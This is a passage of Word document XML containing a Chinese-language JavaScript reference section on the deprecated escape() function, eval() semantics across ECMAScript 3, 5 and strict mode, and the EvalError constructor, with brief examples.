      <w:bookmarkEnd w:id="661"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>已弃用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>编码一个字符串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t>escape(s)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>待</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>转义</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>或编码的字符串。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s</w:t>
      </w:r>
      <w:r>
        <w:t>的一个编码后的副本，其中某些字符已替换为十六进制转义序列。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>escape()</w:t>
      </w:r>
      <w:r>
        <w:t>是一个全局函数。它返回一个包含</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>的一个已编码版本的新字符串。字符串</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>本身并未修改。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>escape()</w:t>
      </w:r>
      <w:r>
        <w:t>返回的字符串中，</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>中非</w:t>
      </w:r>
      <w:r>
        <w:t>ASCII</w:t>
      </w:r>
      <w:r>
        <w:t>字母、数字以及标点字符</w:t>
      </w:r>
      <w:r>
        <w:t>@</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>的所有字符都已替换为</w:t>
      </w:r>
      <w:r>
        <w:t>%xx</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>%u xxxx</w:t>
      </w:r>
      <w:r>
        <w:t>（其中</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>为一个十六进制数字）格式的转义序列。</w:t>
      </w:r>
      <w:r>
        <w:t>\u0000</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>\u00ff</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>字符替换为</w:t>
      </w:r>
      <w:r>
        <w:t>%xx</w:t>
      </w:r>
      <w:r>
        <w:t>转义序列，其他</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>字符则将替换为</w:t>
      </w:r>
      <w:r>
        <w:t>%u xxxx</w:t>
      </w:r>
      <w:r>
        <w:t>序列。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可使用</w:t>
      </w:r>
      <w:r>
        <w:t>unescape()</w:t>
      </w:r>
      <w:r>
        <w:t>函数来解码由</w:t>
      </w:r>
      <w:r>
        <w:t>escape()</w:t>
      </w:r>
      <w:r>
        <w:t>编码的字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>虽然</w:t>
      </w:r>
      <w:r>
        <w:t>escape()</w:t>
      </w:r>
      <w:r>
        <w:t>函数在第</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>版</w:t>
      </w:r>
      <w:r>
        <w:t>EC</w:t>
      </w:r>
      <w:r>
        <w:t>MAScript</w:t>
      </w:r>
      <w:r>
        <w:t>中成为标准，但在第</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>版</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>中弃用并移除它。</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>的各种实现大多还支持这个方法，但这并不是必需的。建议使用</w:t>
      </w:r>
      <w:r>
        <w:t>encodeURI()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>encodeURIComponent()</w:t>
      </w:r>
      <w:r>
        <w:t>来代替</w:t>
      </w:r>
      <w:r>
        <w:t>escape()</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escape("Hello World!");//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>"Hello%20World%21"</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encodeURI()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>encodeURIComponent()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="662" w:name="eval__"/>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="662"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>执行一段字符串中的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>eval(code)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>cod</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>包含待求值的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>表达式或待执行的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语句的字符串。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求值后的代码的值，如果存在对应的值的话。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>异常</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>code</w:t>
      </w:r>
      <w:r>
        <w:t>不是合法的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码，则</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>将抛出一个</w:t>
      </w:r>
      <w:r>
        <w:t>SyntaxError</w:t>
      </w:r>
      <w:r>
        <w:t>。如果在对</w:t>
      </w:r>
      <w:r>
        <w:t>code</w:t>
      </w:r>
      <w:r>
        <w:t>求值的过程中发生了错误，则</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>将传播这个错误。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>是一个用于执行一段</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码字符串的全局方法。如果</w:t>
      </w:r>
      <w:r>
        <w:t>code</w:t>
      </w:r>
      <w:r>
        <w:t>包含一个表达式，则</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>将对该表达式求值并返回这个值。（一些表达式（如看起来像语句的对象和函数直接量）在传入</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>时必须包含在圆括号中以消除多义性。）如果</w:t>
      </w:r>
      <w:r>
        <w:t>code</w:t>
      </w:r>
      <w:r>
        <w:t>包含一条或多条</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语句，则</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>将执行这些语句，并由最后一个语句返回对应值。如果</w:t>
      </w:r>
      <w:r>
        <w:t>code</w:t>
      </w:r>
      <w:r>
        <w:t>不返回任何值，则</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>将返回</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>。最后，如果</w:t>
      </w:r>
      <w:r>
        <w:t>code</w:t>
      </w:r>
      <w:r>
        <w:t>抛出异常，则</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>将把这个异常传递给调用函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScri</w:t>
      </w:r>
      <w:r>
        <w:t>pt 3</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中，</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>的行为不同，甚至在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中，在严格和非严格模式下它的行为也不相同，为了解释这些差异，需要一个小的额外话题。如果一门编程语言将</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>定义为一个操作符而不是一个函数，那么实现高效的解释器会容易很多。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>是一个函数，出于效率的考虑，它在直接、类似操作符一样调用和非直接调用</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>之间做了区分。直接调用是指直接使用标识符</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>，如果去掉圆括号，看起来</w:t>
      </w:r>
      <w:r>
        <w:t>ev</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>al()</w:t>
      </w:r>
      <w:r>
        <w:t>就像一个操作符。其他形式的</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>的调</w:t>
      </w:r>
      <w:r>
        <w:t>用都是非直接调用。如果将</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>函数赋值给一个名字不同的变量，并通过该变量调用它，这也是一种非直接调用。类似地，如果将</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>作为全局对象的一个方法来调用，它也是一种非直接调用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>根据直接和非直接调用的差别，可以将</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>的行为归纳如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>直接调用，</w:t>
      </w:r>
      <w:r>
        <w:t>ES3</w:t>
      </w:r>
      <w:r>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:t>ES5</w:t>
      </w:r>
      <w:r>
        <w:t>非严格模式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>在当前词法作用域内对</w:t>
      </w:r>
      <w:r>
        <w:t>code</w:t>
      </w:r>
      <w:r>
        <w:t>求值。如果</w:t>
      </w:r>
      <w:r>
        <w:t>code</w:t>
      </w:r>
      <w:r>
        <w:t>包含变量或函数声明，则将在本地作用域中定义它们。这是</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>的普通用例。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>非直接调用，</w:t>
      </w:r>
      <w:r>
        <w:t>ES3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ECMAScript 3</w:t>
      </w:r>
      <w:r>
        <w:t>标准化允许解释器对任何</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>的非直接调</w:t>
      </w:r>
      <w:r>
        <w:t>用抛出一个</w:t>
      </w:r>
      <w:r>
        <w:t>EvalError</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>ES3</w:t>
      </w:r>
      <w:r>
        <w:t>的实现实际上一般没有这么做，但应该避免非直接调用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>非直接调用，</w:t>
      </w:r>
      <w:r>
        <w:t>ES5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中，对</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>的非直接调用不再抛出</w:t>
      </w:r>
      <w:r>
        <w:t>EvalError</w:t>
      </w:r>
      <w:r>
        <w:t>，但</w:t>
      </w:r>
      <w:r>
        <w:t>code</w:t>
      </w:r>
      <w:r>
        <w:t>必须在全局作用域中求值，当前词法作用域内的任何本地变量都将忽略。在</w:t>
      </w:r>
      <w:r>
        <w:t>ES5</w:t>
      </w:r>
      <w:r>
        <w:t>中，可以这样赋值：</w:t>
      </w:r>
      <w:r>
        <w:t>"var geval=eval;"</w:t>
      </w:r>
      <w:r>
        <w:t>，然后使用</w:t>
      </w:r>
      <w:r>
        <w:t>geval()</w:t>
      </w:r>
      <w:r>
        <w:t>来在全局作用域中对</w:t>
      </w:r>
      <w:r>
        <w:t>code</w:t>
      </w:r>
      <w:r>
        <w:t>求值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>直接或非直接调用，严格模式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在严格模式中，</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">c </w:t>
      </w:r>
      <w:r>
        <w:t>ode</w:t>
      </w:r>
      <w:r>
        <w:t>中定义的变量和函数将在一个私有作用域中定义，这个私有作用域仅在调用该</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>期间有效。这意味着，在严格模式下直接调用</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>将不能改变词法作用域，在严格模式下的非直接调用不能更改全局作用域。当对</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>的调用在严格模式下，或者如果</w:t>
      </w:r>
      <w:r>
        <w:t>code</w:t>
      </w:r>
      <w:r>
        <w:t>以</w:t>
      </w:r>
      <w:r>
        <w:t>"use strict"</w:t>
      </w:r>
      <w:r>
        <w:t>指令开始时，这些规则将生效。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>这门语言中</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>提供了非常强大的功能，但实际项目中它使用的不多。常用的场景包括编写作为递归的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>解释器的程序，以及编写动态生成并判断</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码</w:t>
      </w:r>
      <w:r>
        <w:t>的程序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对于大多数期望参数传入字符串参数的函数来讲，在执行真正的逻辑时，不管传入的参数是什么类型都会首先转换为字符串。</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>则不会这样，如果传入的参数不是字符串原始值，它会直接返回这个值。因此，当传入一个字符串对象给</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>时就需要非常小心了，这时应当传入一个字符串原始值才对。</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eval("1+2");//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这段代码使用客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>方法来提示用户输入一个表达式，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>然后向用户显示它的求值结果</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>更多细节可参阅客户端方法</w:t>
      </w:r>
      <w:r>
        <w:t>Window.alert()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>.prompt()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>try{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>alert("</w:t>
      </w:r>
      <w:r>
        <w:t>结果：</w:t>
      </w:r>
      <w:r>
        <w:t>"+eval(prompt("</w:t>
      </w:r>
      <w:r>
        <w:t>请输入一个表达式：</w:t>
      </w:r>
      <w:r>
        <w:t>","")));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>catch(exception){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>alert(exception);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="663" w:name="EvalError"/>
      <w:r>
        <w:t>EvalError</w:t>
      </w:r>
      <w:bookmarkEnd w:id="663"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>使用错误时抛出</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>→</w:t>
      </w:r>
      <w:r>
        <w:t>错误</w:t>
      </w:r>
      <w:r>
        <w:t>→EvalError</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EvalError()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>new EvalError(message)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t>message</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一条可选的错误消息，提供了关于该异常的细节。如果指定，这个参数将用做这个</w:t>
      </w:r>
      <w:r>
        <w:t>EvalError</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值。</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一个新构造的</w:t>
      </w:r>
      <w:r>
        <w:t>EvalError</w:t>
      </w:r>
      <w:r>
        <w:t>对象。如果指定</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>参数，则</w:t>
      </w:r>
      <w:r>
        <w:t>Error</w:t>
      </w:r>
      <w:r>
        <w:t>对象将把它用做其</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值，在其他情况下，它将使用预定义的默认字符串作为该属性的值。当不带</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>操作符，像一个函数一样调用</w:t>
      </w:r>
